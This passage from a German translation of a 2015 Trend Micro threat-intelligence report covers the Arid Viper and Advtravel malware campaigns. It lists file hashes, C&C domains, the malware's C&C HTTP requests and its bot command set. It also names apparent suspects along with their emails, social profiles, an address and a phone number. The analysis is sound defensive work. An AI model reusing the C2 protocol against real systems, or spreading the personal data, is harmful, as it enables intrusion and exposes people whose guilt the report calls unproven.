beinhaltet pswd4.exe d8209defc3966076737401d0a22d27d3 Legt .TXT-Datei ab, die URLs, Benutzernamen und Kennwörter beinhaltet start.exe 0ae436d95cc1eb6a9b57df984734973e Lädt pat2.exe hinunter svrg.exe c8d387bb135d9acef3dfcf56464078fb Ändert AutoAusführen-Einträge in der Registrierung 11 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Dateiname MD5-Hash Zweck usbf2.exe d57e0f5f0320f1b3fd8ae81a370170d0 Wird als TROJ_STRPADT.A erkannt und lädt pat2.exe herunter usbf4.exe e36680a19601f84af6d311e1fb847eef Wird als TROJ_STRPADT.A erkannt und lädt pat2.exe herunter vvb.exe 2a38ff709549b97b4e42b6fae81c6177 Ändert AutoAusführen-Einträge in der Registrierung vvb.sfx.exe f747d5f998e48279cad7e9ed46e86a6b Legt die Datei VVB.exe ab /pat/: Beinhaltet zwei Dateien (siehe folgende Tabelle). Dateiname pat2.exe MD5-Hash Zweck 7171feeedd345a7d50091e76fc7e3ac4 SFX-Archiv, das micro.exe installiert aa55cb19c3a61c0177e75198c70d6fa3 Erstes Exemplar ist eine normale Datei, während das zweite als TROJ_STRPADT.A erkannt wird pat4.exe dcd2314f1af5dd1fd3e317bdf32faabb /patlogs/: Jede vom C&C-Server ausgeführte Aktion wird hier in einer Reihe detaillierter Protokolldateien aufgezeichnet. Jede Protokolldatei verwendet das Format Log_A[3 letters]X_[COMPUTERNAME_USERNAME]_m-dd-yyyyhh‑mm‑ss.log. Protokollabschnitt mit Daten von Opfern, die von einem Angreifer gestohlen wurden, der als admin@dhs angemeldet war 12 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper /rpts/: Beinhaltet verschiedene leere Unterverzeichnisse und zwei Dateien (siehe folgende Tabelle). Dateiname MD5-Hash Zweck pat.exe 2e5da32b07c531a6508b77f624bbeb22 Dieselbe Datei wie start.exe app11.exe 342f79337765760ad4e392eb67d5ed2c MSI-Installer für dotnet2 /tools/: Beinhaltet einige .PHP-Dateien, zwei .EXE-Dateien und eine TXTDatei (siehe folgende Tabelle). Dateiname MD5-Hash Zweck dotnet2.exe c64fd1f972822ed84378c7058fea0744 Rechtmäßiger .NET-Installer wininstl.exe 342f79337765760ad4e392eb67d5ed2c Dieselbe Datei wie app11.exe LastIps.txt: Umfangreiche Liste mit IP-Adressen in Verbindung mit Personen, die auf die Seite advtravel.info/tools/ip.php zugreifen. Geolokationsdaten lassen erkennen, dass diese Personen weltweit verteilt waren. Die letzte Anmeldung des Angreifers auf dem Server kann dank Geolokalisation auf Gaza in Palästina zurückverfolgt werden. Die Domain advtravel.info wurde 2013 auf datengeschützte Whois-Server verschoben. Von 2007 bis 2012 war die Domain jedoch folgendermaßen registriert: Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Name:Adv Travels Organization:Adv Travels Street1:4401 Bayou Boulevard Street2: Street3: City:Pensacola State/Province:Florida Postal Code:32503 Country:US Phone:+01804777777 Phone Ext.: FAX: FAX Ext.: Email:[email protected] Malware Eine Analyse der gestohlenen Dateien und Protokolle ermöglichte es uns, eine kurze Beschreibung der ursprünglichen Advtravel-Malware zu erstellen. Im Wesentlichen dient die Malware lediglich dazu, einem C&C-Server zu antworten. Die Angreifer luden dann manuell andere Tools auf infizierte Systeme, um Anmeldedaten von Opfern zu entwenden. Nachdem die ersten Dateiablagen oder Downloads abgeschlossen sind, startet die Malware die datenstehlende Routine. Sie ruft den C&C-Server zurück und meldet jeden 13 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper auf dem System gefundenen Ordner. Der Server antwortet, indem er der Malware mitteilt, ob die Inhalte der Ordner gesendet werden sollen oder nicht. Die Malware von Advtravel und die von Operation Arid Viper zeigten ein ähnliches Verhalten. Dies mag möglicherweise ein Zufall sein, da die Binärdateien sich deutlich voneinander unterschieden. Die AdvtravelMalware wurde in C# programmiert, sodass die Dropper-Datei zusätzliche Schritte durchlaufen muss, um eine .NET-ausführende Umgebung dort zu erstellen und zu aktualisieren, wo dies möglich ist. Hierzu sind Downloads und Microsoft™ Softwareinstallationen erforderlich. Dies verzögerte nicht nur die Infektion bedeutend, sondern brachte auch zusätzliche potenzielle Fehlerquellen mit sich. Im Folgenden sind einige HTTP-Anforderungen aufgeführt, die in Verbindung mit der Operation Advtravel entdeckt wurden: • GET/sys/who.php?t=2/8/2015%205:30:59%20AM HTTP/1.1: Erste Anmeldung. • GET/sys/genid.php?t=2/8/2015%205:31:00%20AM: Fordert eine eindeutige ID für einen bestimmten erstmaligen Client an. Die in diesem Beispiel zurückgegebene ID war 2aMUu7TcPbUBsHVLNogB.vic. Der Bot-Client wird diese ID durchgängig verwenden. • POST/sys/upload.php?dirname=//2aMUu7TcPbUBsHVLNogB.vic&x=old: Informationen über Verzeichnisnamen senden. • GET/sys/data//2aMUu7TcPbUBsHVLNogB.vic/command.cmd?t= 2/8/2015%205:31:02%20AM: Befehl vom Server erhalten. Mögliche Infektionskette der Advtravel-Malware In einem bestimmten Beispiel war die erste Malware eine selbstextrahierende .CAB-Datei, die anschließend die Haupt-Malware und die Datei patver.tmp mit dem Wert A012X herunterlud. Der Wert gibt den Serverordner an, in den die gestohlenen Daten hochgeladen werden sollen. Dies ist im Wesentlichen eine eindeutige Kampagnenkennung. Dann legte die Malware eine .JPG-Datei ab, die den Felsendom in Jerusalem zeigt. Zudem zeigten sich folgende Verhaltensweisen: • Installiert sich automatisch in einem Standardordner wie C:\Users\[USER]\ AppData\Roaming\AdobeAPP oder C:\Documents and Settings\[USER]\ Application Data\explr • Speichert Protokolle und Support-Dateien unter C:\Users\[USER]\AppData\ Roaming\AdobeAPP\temp (Beachten Sie, dass die .EXE-Datei variiert und anscheinend bei Bedarf heruntergeladen wird.) • Nutzt viele der bereits in einem anderen Abschnitt beschriebenen SupportDateien, die sich im Ordner \temp befinden • Kann zum Beispiel folgende Befehle an Bots senden: get_scrshot: Screenshot anfordern. get_workdata: Gibt die lokale Zeit, das Betriebssystem, den Benutzer domainnamen,, den Benutzernamen und den Malware-Pfad eines infizierten Systems zurück. explore_dir*[FULL PATH TO DIR]: Erstellt eine Verzeichnisliste. run_file*[FILE TO RUN]: Führt eine Datei aus. 14 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper get_file*[FILE TO GET]: Ruft die Datei vom System eines Opfers ab. get_procslist: Ruft eine Prozessoder Taskliste ab. kill_prcs*[PID]: Bricht einen Prozess ab. get_driveslist: Erstellt eine Liste sämtlicher montierter Laufwerke eines infizierten Systems. =FILE=: Ermöglicht es Angreifern, neue Dateien auf das System des Opfers hochzuladen. download*[URL]: Lädt eine Datei von einer URL auf ein infiziertes System herunter. Löscht eine Datei oder einen Ordner. • Kommuniziert mit dem Verzeichnis advtravel.info/apps/, um auf Befehle zu warten, und lädt gestohlene Dateien in das Verzeichnis /del. Das Protokoll gibt das aktuelle Verzeichnis eines infizierten Systems an, führt ein Kennwortdiebstahl-Programm aus, fragt gestohlene Anmeldeinformationen ab und erfasst Screenshots. Basierend auf patlogs melden sich mindestens vier Botnet-Administratoren – khloda@dhs, belal@dhs, belal2@dhs und admin@dhs – am Server an und kontrollieren die Bots über den Administrationsbildschirm, ein Tool mit der Bezeichnung DHDSM. Protokoll der Aktivitäten, die eine Variante der Advtravel-Malware auf infizierten Systemen ausführt Opfer Der Advtravel-Server verfügt über Daten von mehr als 500 infizierten Systemen. Alle gestohlenen Details, die auf dem Server gefunden wurden, wurden zu Beweis zwecken gesichert. Die meisten Daten wurden analysiert, um eine Vorstellung davon zu erhalten, welche Opfer von der Kampagne betroffen sind. Im Folgenden sind einige Beobachtungen aufgeführt: • Bei der Mehrheit der Opfer scheint es sich um Araber aus Ägypten zu handeln. • Alle infizierten Systeme waren anscheinend private Laptops, was sich aus der Akkuanzeige auf Screenshots schließen lässt. Dies führte uns zu der Annahme, dass die Kampagne technisch weniger raffiniert oder gezielt war als die Operation Arid Viper. 15 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper • Die Angreifer scheinen ein ausgesprochen hohes Interesse an Bildern zu haben, die auf den Systemen der Opfer gespeichert sind. Dies könnte ein Zeichen dafür sein, dass sie nach belastenden oder kompromittierenden Bildern suchen, die sie zu Erpressungszwecken nutzen können. Die Angreifer sind daher möglicherweise weniger erfahrene Hacker, deren Motive weder finanzielle Gewinne noch Spionage sind. • Ungewöhnlich viele Screenshots zeigten geöffnete Facebook-Profile. Die Opfer verbrachten entweder täglich sehr viel Zeit auf Facebook oder die Malware erfasste jedes Mal einen Screenshot, wenn ein Opfer auf die Website zugriff. Hierdurch konnten die Angreifer ihre Opfer identifizieren. Mehr Informationen hierzu werden nach weiteren Untersuchungen veröffentlicht. fpupdate.info Server Das Hauptverzeichnis des Servers fpupdate.info enthält einen Ordner /mobile/. Zum Zeitpunkt der Erstellung dieses Berichts ließ die Web site keinen öffentlichen Zugriff auf die Dateien des Servers zu. Im September 2014 war es uns jedoch noch möglich, ein entsprechendes Backup zu erstellen. Derzeit kann keine der verbundenen .PHP-Dateien auf die BackendDatenbank des Servers zugreifen. Der Server ist daher möglicherweise heruntergefahren oder wird nicht mehr gewartet. Ein Upload-Ordner verfügte über zwei Unterordner mit persönlichen Daten, die von Mobil telefonen von Opfern gestohlen worden waren. Jeder Unterordner enthielt zwei weitere Unterordner: /calllog und /sms. Es war uns jedoch nicht möglich, eine Kopie der Android™-Malware zu erhalten, mit der die Angreifer möglicherweise die Protokolle erstellt haben. fpupdate.info Hauptverzeichnis OPFER Der Server fpupdate.info beinhaltete gestohlene Telefondaten von folgenden zwei Opfern: Daten von Opfern, gespeichert auf fpupdate.info • LGE_IMEI: Die International Mobile Station Equipment Identity (IMEI)Nummer zeigte, dass es sich um das Telefonmodell LG D821 Nexus 5 handelte. Eigentümer war eine Person aus Israel. Auf dem Server wurden Anrufprotokolle gefunden, die verschiedene israelische Telefonnummern enthielten, denen teilweise Kontaktnamen zugewiesen waren. Ein bestimmter Kontakt mit der Bezeichnung Meine Nummer gehörte zu einer Person aus Palästina. • SAMSUNG_IMEI: Die IMEI-Nummer dieses Geräts zeigte, dass es sich um das Modell Samsung P5100 Galaxy Tab 2 10.1 handelte. Eigentümer war eine Person aus Israel. Gefundene Anrufprotokolle belegten, dass verschiedene israelische Telefonnummern angerufen wurden. Zudem wurden SMS-Protokolle gefunden. Die meisten Textnachrichten waren Tweets von @shadipal2 und @Alaqsavoice_Brk – Benutzer, die Echtzeitnachrichten über Gaza veröffentlichten. In den anderen Textnachrichten ging es um Treffen an Orten in Tunesien wie Gafsa und Skiet Eddaier. 16 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper LINKSIS.INFO SERVER Zusätzlich zu den zwei bereits erwähnten Servern zeigt auch linksis.info eine sehr ähnliche offene Verzeichnisstruktur wie advtravel.info. Der Server nutzte außerdem zum großen Teil dieselbe Malware. Wir haben diesen Server nicht vollständig untersucht. Ein kurzer Blick zeigte jedoch eindeutig Verbindungen zu advtravel.info. Beispiele: • Der Server wird auf derselben IP-Adresse 188.40.106.84 mit Standort in Hetzner, Deutschland, gehostet. • Der DNS SOA-Datensatz nutzte die E-Mail-Adresse mahmoud.hashem12@gmail.com. • Der Server verfügt über den Ordner http://www.linksis.info/sys/del/belal/, dessen Eigentümer einer der Benutzer der C&C-Systemsteuerungen von advtravel.info ist. • Der Server beinhaltet dieselben Protokolldateien wie webbrowser.txt usw. – diese waren jedoch verschlüsselt. ZUORDNUNGSHINWEISE Die Personen, die in diesem Abschnitt identifiziert werden, stehen offensichtlich in Verbindung mit Operation Arid Viper oder Advtravel. Trend Micro weist jedoch darauf hin, dass dies nicht beweist, dass die Personen an cyberkriminellen Aktivitäten beteiligt sind oder nicht. Wie möchten hier lediglich verifizierte Fakten darlegen, die diese Personen mit der Infrastruktur und Malware dieser Kampagnen in Verbindung bringen. Es gibt verschiedene andere Gründe, z. B. der Diebstahl ihrer E-Mail-Konten und deren Nutzung zur Registrierung von C&C-Servern, vorsätzlicher Identitätsbetrug oder ähnliche Umstände, die ebenfalls eine Erklärung für ihre Verbindungen zu den Kampagnen liefern könnten. Khalid Samra Einige der C&C-Domainnamen wurden durch eine Person mit dem vermeintlichen Namen Khalid Samra aus Palästina registriert. Die E-Mail-Adressen seiner sozialen Netzwerke wurden genutzt, um verschiedene C&C-Server von Operation Arid Viper basierend auf Whois-Registrierungsdaten zu registrieren. Eine E-Mail-Adresse, die den Namen von Samra beinhaltete – [email protected] – wurde verwendet, um den C&CServer pstcmedia.com basierend auf DNS SOA-Datensätzen zu 17 | Seite Das Profil von Khalid Samra erwähnt auch, dass er in Palästina ansässig ist. © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Die zwei Facebook-Konten von Samra mit übereinstimmenden Profilen und Bildern Zwei Facebook-Seiten, mit denen Samra in Verbindung steht registrieren. Weitere OSINT-Untersuchungen deckten Verbindungen zu anderen ähnlichen E-Mail-Adressen auf: [email protected], khalid.samraa@ hotmail.com, [email protected] und [email protected]. Um mehr über die Person Samra zu erfahren und herauszufinden, ob er ein Motiv für eine Teilnahme an den Kampagnen habe könnte, schauten wir uns seine Konten in anderen sozialen Netzwerken an. Offensichtlich verfügt er über zwei FacebookKonten: https://www.facebook.com/khaled.a.samraa und https://www.facebook.com/ khalid.k.abusamra. Die E-Mail-Adresse des ersten Kontos wurde verwendet, um einen der C&C-Server der Operation Arid Viper zu registrieren. Nach den öffentlich sichtbaren Bildern zu urteilen war er der Eigentümer aller drei Konten. Die Konten zeigen, dass er in Gaza lebt und pro-palästinensische und anti-israelische politische Überzeugungen vertritt. 18 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Auch das zweite scheinbare Facebook-Konto von Samra lässt erkennen, dass er aus Gaza kommt. Hier wird außerdem das Unternehmen erwähnt, in dem er arbeitete: Coreions. Dies entspricht den Angaben seines LinkedIn-Profils. Im Gegensatz zum ersten Konto verfügt dieses jedoch über mehrere Verbindungen zu verschiedenen Familienmitgliedern. Darüber hinaus belegen veröffentlichte Fotos deutlich, dass er im Jahr 2012 in Gaza war. Eine weitere Facebook-Suche nach der E-MailAdresse [email protected] verwies außerdem auf eine Gruppen seite mit der Bezeichnung „GazaUnderFire2012“ (https://www.facebook. com/GazaUnderFire2014). Sie wurde offenbar von Samra im Jahr 2012 eingerichtet. Diese Seite führte dann zu der neueren Gruppenseite „Gaza Under Attack 2014“ (https://www.facebook.com/gazaunderattack2014). Beide Seiten stellen Neuigkeiten zum derzeitigen Konflikt zwischen Palästina und Israel bereit, wobei eine stark pro-palästinensische (Pro‑Hamas) und anti-israelische Haltung vertreten wird – ganz wie bei den privaten Facebook-Konten von Samra. Neben den Facebook-Konten verfügte Samra über Konten in weiteren sozialen Netzwerken wie Twitter (https://twitter.com/KhalidSamraa), Google+ (https://plus.google.com/113430785728528060894/ und https://plus.google.com/117379342774799926526/) sowie MySpace (http://myspace.com/225923317). Am 4. November 2011 wurde der Whois-Datensatz von Coreions erneut geändert. Obwohl alle wesentlichen Daten gleich blieben, wurde die E-Mail-Adresse zu [email protected] geändert. Am 13. Januar 2012 wurden die gesamten Registrierungsdaten folgendermaßen geändert: khalid abu samra () Gaza- Al Rimal- Al Wihda Street, Opposite to Al-Amal institu Al-Nakheel commercial mall, 1st floor Gaza, ISRAEL 00972 IL Ahmed Jmal Die E-Mail-Adresse [email protected] wurde verwendet, um zwei C&C-Server der Operation Arid Viper zu registrieren: mixedwork. com und plmedgroup.com. Es gibt auch Verbindungen zum FacebookKonto https://www.facebook.com/ahmed.jmal.00. Im Facebook-Konto von Ahmed Jmal ist als Wohnsitz Marrakesh in Marokko angegeben. Mahmoud Hashem Die E-Mail-Adresse [email protected] wurde verwendet, um die zwei C&C-Server mediahitech.info und ahmedfaiez.info der Operation Arid Viper zu registrieren. Darüber hinaus wurde über diese E-Mail-Adresse eine der C&C-Domains von Advtravel registriert: fpupdate.info. Ahmedfaiez.com und fpupdate.info haben ebenfalls Verbindungen zur E-Mail-Adresse [email protected]. Diese Tatsache belegt, dass es eine Beziehung zwischen den zwei Kampagnen gibt, 19 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper obwohl sie separate Binärdateien nutzten. Es gab einige Gemein samkeiten wie zum Beispiel die Nutzung einer gemeinsamen Netzwerkinfrastruktur. [email protected] wurde außerdem verwendet, um sechs der mit beiden Kampagnen verbundenen C&C-Server zu registrieren: ahmedfaiez.info, fpupdate.info, ineltdriver.com, flushupdate.com, flushupate. com und advtravel.info. Die E-Mail-Adresse wurde außerdem in DNS SOA-Datensätzen für linkedim.in, iwork-sys.com, nauss‑lab.com, nice-mobiles.com und abuhmaid.net gefunden. Die Website linkedim.in war unter Verwendung folgender Daten registriert: Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Registrant Die E-Mail-Adresse von Ahmed Jmal wurde verwendet, um zwei C&C-Server der Operation Arid Viper zu registrieren. Name:Mahmoud Hashem Organization:blogging hoster Street1:omar mokhtar City:gaza State/Province:gaza strip Postal Code:00972 Country:IL Phone:+972546587385 Email:[email protected] Die oben stehenden Registrierungsdaten schaffen eine Verbindung zwischen den zwei E-Mail-Adressen [email protected] und [email protected]. Wir glauben, dass beide zu ein und derselben Person gehören. Bisher konnten wir jedoch aus diesen Profilen noch keine reale Person ermitteln. Dev_hima Wie bereits erwähnt, können verschiedene Infektionsprotokolle von advtravel.info eindeutig mit den Malware-Entwicklern oder Bot-Mastern der Operation Advtravel in Verbindung gebracht werden. Darüber hinaus ist zu beachten, dass sich die in Operation Advtravel und die in Operation Arid Viper verwendete Malware deutlich voneinander unterschied, obwohl eine gemeinsame Netzwerkinfrastruktur genutzt wurde. Die Protokolle belegten, dass die Infektion aus demselben Ordner gestartet wurde, in dem Visual Studio® eine kompilierte Datei ablegte. Screenshots zeigten außerdem, dass weitere Malware auf advtravel.info vorhanden war. advtravel.info ist demnach eine Entwicklungsumgebung. Mit hoher Wahrscheinlichkeit könnte es sich dabei um die Umgebung handeln, in der die Malware programmiert wurde. Der Benutzername des Servers lautet Dev_hima. Bei einer näheren Untersuchung weiterer Protokolldateien konnten wir mindestens drei weitere Systeme mit demselben Benutzer ausfindig machen. Einige Beispiele aus der Trend Micro Exemplardatenbank nannten Dev_hima ebenfalls als internen Autor. 20 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Die Bot-Protokolle von Dev_ hima sehen aus wie Protokolle aus Testumgebungen mit verschiedenen virtuellen Maschinen. Diese gehörten dem ursprünglichen Entwickler, der einige Aktionen zur Fehler behebung und zum Testen durch führte. Dieser Fehler setzte sich jedoch noch weiter fort, denn während der Malware-Tests wurden Screenshots des Systems von Dev_hima erfasst. Hierdurch gelang es uns, einen Einblick in seine Tätigkeiten zu gewinnen. Die CPanel-Anzeige in einer Windows 8-Umgebung zeigte, wie er durch Opfer-Protokolle navigierte. Andere im selben Browser geöffnete Registerkarten zeigen seine Facebook-Profil seite an. Auf advtravel.info gespeicherter Screenshot vom System von Dev_hima Bei der Systemsteuerung handelt es sich um ein Windows-Tool mit der Bezeichnung „DHSDM“. Das entsprechende Programmsymbol ist auch ganz rechts auf der Taskleiste zu sehen. Dies ist auf verschiedenen anderen virtuellen Testmaschinen von Dev_hima zu finden. Es wurde außerdem ersichtlich, dass Dev_hima der Admin-Benutzer der Systemsteuerung war. Andere Details aus Protokollen deckten eine IP-Adresse mit Geoposition Kairo, Ägypten, auf. Informationen zu einer Malware-Variante, die von Dev_hima herausgegeben wurde Ein weiterer Hinweis auf eine Verbindung von Dev_hima zur Advtravel-Malware war ein funktionsfähiger Downloader aus dem Dezember 2014, der in Beziehung zu advtravel.info steht. Das Programm lud eine Malware von einem Server herunter, die dann auf infizierten Systemen ausgeführt wurde. Im PE-Header dieses Downloaders war ebenfalls der Name Dev_hima zu finden – diesmal als Herausgeber der Anwendung. Nveron scheint der Dateiname zu sein, den Dev_hima für die Malware gewählt hat. Eine Websuche nach Entwicklern mit dem Nicknamen Dev_hima ergab ein Profil, das mit unseren bisherigen Erkenntnissen weitgehend übereinstimmt. Dev_hima war im Internet äußerst präsent. Er verfügte über verschiedene Onlinekonten wie http://devhima.blogspot.com/p/blog-page.html, http://devhima.webs.com/about, youtube.com/user/ibrahhm2121/, facebook.com/devhima, twitter.com/dev_hima, linkedin.com/pub/ebrahim-elsharawy/69/324/7b5, scribd.com/devhima, 21 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper soundcloud.com/ebrahimelsharawy und devhima.tumblr. com, die seine reale Identität mit seinem Nicknamen verbinden. Dev_hima steht auch mit der Skype-ID ibrahhm2121 sowie den E-Mail-Adressen dev_hima@ yahoo.com, devhima@hotmail. com, [email protected], [email protected] und [email protected] im Zusammenhang. Natürlich ist es denkbar, dass ein bösartiger Hacker sich die Identität von El Shrawy aneignete oder zufällig diesen Nicknamen auswählte. Einige der Profile von Dev_hima in sozialen Netzwerken Ein näherer Blick auf bösartige Aktivitäten, die mit dem Nick namen Dev_hima in Zusammen hang stehen, brachte äußerst interessante Erkenntnisse. Wir fanden heraus, dass Dev_hima ein Mitglied des „Gaza Hacker Teams“ war – eine Gruppe, die in der Vergangenheit in zahlreiche Vorfälle von WebsiteHacking- und -Verunstaltung von israelischen Zielen verwickelt war. Einige der über 2000 von diesem Team ausgeführten Verunstaltungsangriffe betrafen Websites aus Israel. Dev_hima verfügt auch über Verbindungen zu verschiedenen Diverse Hacker-Gruppenprofile E-Mail-Adressen und Onlinekonten von Dev_hima können auch auf gaza-hacker.org/cc/ member-u_42271.html und arabteam2000-forum.com/index.php/user/272853-devhima/ gefunden werden. Seine persönliche Projektseite http://devhima.webs.com/ zeigt verschiedene bösartige Tools, die von ihm programmiert wurden. Mithilfe von DevPcTwitter können Angreifer zum Beispiel ein Zielsystem über ein Twitter-Konto steuern. DevSpy dagegen ermöglicht es Eltern, zum Schutz ihrer Kinder deren Onlinekommunikation und Surfgewohnheiten zu überwachen. Tatsächlich handelt es sich bei DevSpy jedoch um eine Spyware. DevPcTwitter (MD5: bfcb492d282960152a366b5760b87920d02c6e83) steht öffentlich zum Download auf der Website von Dev_hima bereit. Interessant ist die Struktur der letzten vier DevPcTwitter-Befehle: getfile*[file_path]. Die Befehle hatten eine ähnliche, jedoch nicht vollkommen identische Syntax wie das Format, das der Bot von Dev_hima zur Kommunikation mit advtravel.info nutzte. Dev_hima veröffentlichte Video-Tutorials auf YouTube zur Konfiguration und Ver wendung von DevPcTwitter. Diese Videos waren mit seiner persönlichen Website verknüpft. Die Funktion des Twitter-Bots ist einfach. Ein Benutzer kann ein Twitter-Konto und eine E-Mail-Adresse im DevPCTwitter-Programm registrieren. 22 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Liste mit Website-Angriffen, in die die Hacker-Gruppe von Dev_hima verwickelt war Dann kann der Benutzer Befehle über das registrierte Konto tweeten, die vom Bot gelesen und ausgeführt werden. Befehle wie GetScreenShot fordern DevPcTwitter auf, Screenshots vom Desktop eines Opfers zu machen und diese dann an die registrierte E-Mail-Adresse zu senden. Mithilfe des Befehls Download$[URL] kann der Bot außerdem Dateien herunterladen und ausführen. Oberfläche von DevPcTwitter zeigt, dass das Tool für arabisch sprechende Anwender entwickelt wurde. DevPcTwitter ist als risikoarmes Tool einzuschätzen, da es bei der Einrichtung und Ausführung sehr viel Benutzerinteraktion erfordert. Der dazugehörige Bot kann nicht verborgen im Hintergrund ausgeführt werden. Dev_hima entwickelte außerdem das Spionage-Tool DevSpy. Der entsprechende Installer (MD5: d325c541fa0f3080a25394fe3a586100910f5569) steht ebenfalls zum öffentlichen Download über http://devhima.webs.com/ bereit. Im Gegensatz zu DevPcTwitter verfügt DevSpy nicht über eine arabische, sondern über eine englische 23 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Tools, die zum öffentlichen Download auf der Website von Dev_hima bereitstehen Oberfläche. Auch die Einrichtung des Tools ist recht selbsterklärend. Es erfasst DesktopScreenshots in benutzerdefinierten Intervallen und speichert diese dann in einem Ordner. DevSpy kann verborgen im Hintergrund aus geführt werden. Bei Ausführung im Tarnmodus kann der Zugriff auf das Tool jedoch nur durch eine Tastenkombination erfolgen, für die eine Kennwortauthentifizierung erforderlich ist. In diesem Modus kann DevSpy sich außerdem selbst aus der Prozessliste im Windows TaskManager eines infizierten Systems entfernen. DevSpy stellt ein mittleres bis hohes Risiko dar, denn das Tool wurde speziell entwickelt, um Benutzer im Tarnmodus auszuspionieren. Es ist möglich oder sogar wahrscheinlich, dass die zur Kommunikation mit advtravel.info genutzte Malware eine privat erweiterte Version des Tools von Dev_hima ist. VIRUS_HIMA Dev_hima nutzte die Handles hima, virusxhima und ViRuS_HiMa mit der E-Mail-Adresse [email protected]. Es gab jedoch keine ausreichenden Beweise, um zu belegen, dass es sich bei Dev_hima und ViRuS_HiMa um ein und dieselbe Person handelte. ViRuS_HiMa stand in Verbindung mit verschiedenen bekannten Hacking-Angriffen. Beispiele: • 24 | Seite Der Diebstahl von 150.000 Kennwörtern von Mitarbeitern, Kunden und Partnern von Adobe wie das US-Militär, USAF, Google, NASA und DHL [5] DevPcTwitter unterstützt zahlreiche ausführbare Befehle © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper • Der Cross-Site-Scripting (XSS)-Angriff auf 2shared.com [6] • Über 1.700 Vorfälle von Websiteverunstaltungen • Zu dem SQL-Angriff auf Yahoo! bekannten sich Täter aus Ägypten [7] Einige E-Mail-Adressen mit Verbindungen zu ViRuS_HiMa sind u. a. virusxhima@gmail. com, egypt_government@ hotmail.com, [email protected] und [email protected]. Oberfläche und Setup-Konsole von DevSpy Mohammed Khaled Wie bereits erwähnt verfügte die advtravel.info-Datei Mkhaled.txt über den Link https://www.facebook.com/messages/LODALODALODA. Beim Klicken auf diesen Link wurde eine Facebook-Nachricht an die Profilseite von Mohamed (https://www.facebook.com/ LODALODALODA) gesendet, um diesen über die neue erfolgreiche Infektion eines Systems zu unterrichten. Das Profil zeigt, dass Khaled in Kairo, Ägypten, lebt. Interessanterweise kann eine Person namens Mohamed Khaled des Weiteren mit Dev_hima in Verbindung gebracht werden. Auf einer Seite, auf der das Tool DevPcTwitter von Dev_hima angeboten wird, entdeckten wir einen Kommentar von einem Mohamed Khaled zu diesem Remote-Access-Tool (RAT). Fathy Mostafa Abschnitt aus .TXT-Datei http://www/hackerbox.net/ upload.txt,der eine Beziehung zwischen Dev_hima und ViRuS_HiMa zeigt Fathy Mostafa ist eine weitere Person mit offensichtlichen Verbindungen zur Operation Advtravel. In einem der Protokolle von advtravel.info stießen wir auf einen Screenshot der Advtravel-Haupt-Malware während der Entwicklungsphase. Der Code zeigte das Testen von URLs, die dieselben Pfade wie die eigentliche Malware nutzten, die auf die Domain advtravel.info zugriff. Der Benutzername fathy ist deutlich zu erkennen. Andere Protokolle von derselben Infektion lieferten uns einige Details über gestohlene Konten. Beispiele: • http://members.000webhost.com/login.php wurde unter Verwendung von [email protected] und [email protected] registriert • https://khamsat.com/register, https://www.freelancer.com/ und https://www.linkedin.com/uas/login verwendeten [email protected] Laut Tätigkeitsprofil in beruflichen Netzwerken verfügt Mostafa über Kenntnisse in der C#-Programmierung. Zufällig wurde diese Programmiersprache auch zur Entwicklung der Advtravel-Malware verwendet. 25 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Facebook-Profil und -Bild von Mohammed Khaled Die E-Mail-Adresse [email protected] war auch mit dem Facebook-Konto https://www.facebook.com/fathy. mostafa.1690 verbunden. Das Profil deutet darauf hin, dass Mostafa in Ägypten lebt – wie viele andere Personen, die mit der Operation Advtravel in Verbindung stehen. Er studierte Elektrotechnik und ist Mitglied verschiedener Facebook-Gruppen, von denen zwei mit der Muslimbruderschaft zusammenhängen. [8] Kommentar von Khaled zum RAT von Dev_hima Weitere Personen Zusätzlich zu den bisher erwähnten Personen wurden weitere Nicknamen in Verbindung mit der Operation Advtravel gefunden. In der AdvtravelSystemsteuerung entdeckten wir drei weitere Kontonamen: khodla, belal und belal2. Die Systeme mit Eigentümer Advtravel.info-Protokoll mit dem Malware-Code während „belal“ hatten besondere der Entwicklungsphase Verbindungen zur Operation Advtravel, da sie in den Benutzer namen das Wort „Roo0T“ oder „Ro0t“ verwendeten. Alle seine Systeme verfügten über die Systemsteuerung der Haupt-Malware, zusammen mit Spielen wie „Counter Strike Global Offensive“. Darüber hinaus verfügte er über Ordner mit njrat7-Malware. Dieses RAT wurde in Arabien entwickelt und wird dort unterstützt. Die Malware ist damit besonders in arabischen Ländern sehr verbreitet. Die Ordner von Belal beinhalteten außerdem die .TXT-Datei Israil mails.txt mit 2.572 E-Mail-Adressen – wahrscheinlich als mögliche Angriffsziele. 26 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Facebook-Profil von Mostafa Anmeldung von Belal an Advtravel-Systemsteuerung 27 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zum Betrug mit der gefälschten Banking-App in Südkrea FAZIT Die in diesem Bericht beschriebenen MalwareKampagnen „Operation Arid Viper“ und „Operation Advtravel“ sind separate, aber dennoch eng miteinander verknüpfte Kampagnen. Operation Arid Viper richtet sich gezielt gegen israelische Unternehmen und Organisationen, einschließlich einiger bekannter Opfer. Die Kampagne nutzt eine Netzwerkinfrastruktur in Deutschland und zeichnet sich durch verschiedene enge Beziehungen zu Gaza in Palästina aus. Advtravel dagegen steht mehr im Zusammenhang mit Ägypten, sowohl von Seiten der Täter als auch der Opfer. Basierend auf registrierten 